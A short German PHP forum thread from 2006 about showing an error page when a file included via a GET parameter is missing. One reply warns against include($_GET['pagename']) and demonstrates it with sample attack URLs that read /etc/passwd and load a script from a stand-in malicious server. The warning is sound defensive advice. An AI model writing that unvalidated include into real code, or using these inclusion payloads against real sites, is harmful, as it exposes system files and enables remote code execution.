kale_1990 Geschrieben 23. Oktober 2006 Teilen Geschrieben 23. Oktober 2006 Hallo, erst mal es geht um PHP ;-) ich habe eine Page die über die GET methode die dateinamen für den inhalt übergeben bekommt, wenn jetzt aber eine datei zum beispiel nicht vorhanden ist wird mir ja eine fehlermeldung ausgegeben: Warning: main(falscher_name.php) [function.main]: failed to open stream: No such file or directory in ../inhalt.php on line 16 wie kann ich es nun programmieren das eine fehlerseite angezeigt wird falls ein dateiname nicht vorhanden ist? danke für jede antwort mfg Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
robotto7831a Geschrieben 23. Oktober 2006 Teilen Geschrieben 23. Oktober 2006 Hallo, mit file_exists (http://de2.php.net/function.file-exists) kannst Du überprüfen ob es die Datei gibt. Was für eine Fehlermeldung willst Du haben? Einen Apache 404 Error? Frank Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
kale_1990 Geschrieben 23. Oktober 2006 Autor Teilen Geschrieben 23. Oktober 2006 ja weiß net halt einfach ne seite(von mir selber gmacht) wo halt drinsteht das die datei/seite nicht vorhanden ist/nicht angezeit werden kann!! Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
geloescht_JesterDay Geschrieben 24. Oktober 2006 Teilen Geschrieben 24. Oktober 2006 ich habe eine Page die über die GET methode die dateinamen für den inhalt übergeben bekommt Da solltest du aber viele Prüfungen reinmachen. Nein, nicht nur viele. Noch viel mehr. include($_GET["pagename"]); :eek Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
kale_1990 Geschrieben 24. Oktober 2006 Autor Teilen Geschrieben 24. Oktober 2006 was ist los?? Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
geloescht_JesterDay Geschrieben 24. Oktober 2006 Teilen Geschrieben 24. Oktober 2006 was ist los?? was los ist? meinSkript.php?pagename=/etc/passwd ... include($_GET["pagename"]); nur mal als Beispiel EDIT: Oder noch besser: meinSkript.php?pagename=http://einBoeserServer.tld/boesesSkript.php include($_GET["pagename"]); Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen Mehr Optionen zum Teilen...
Empfohlene Beiträge
Dein Kommentar
Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.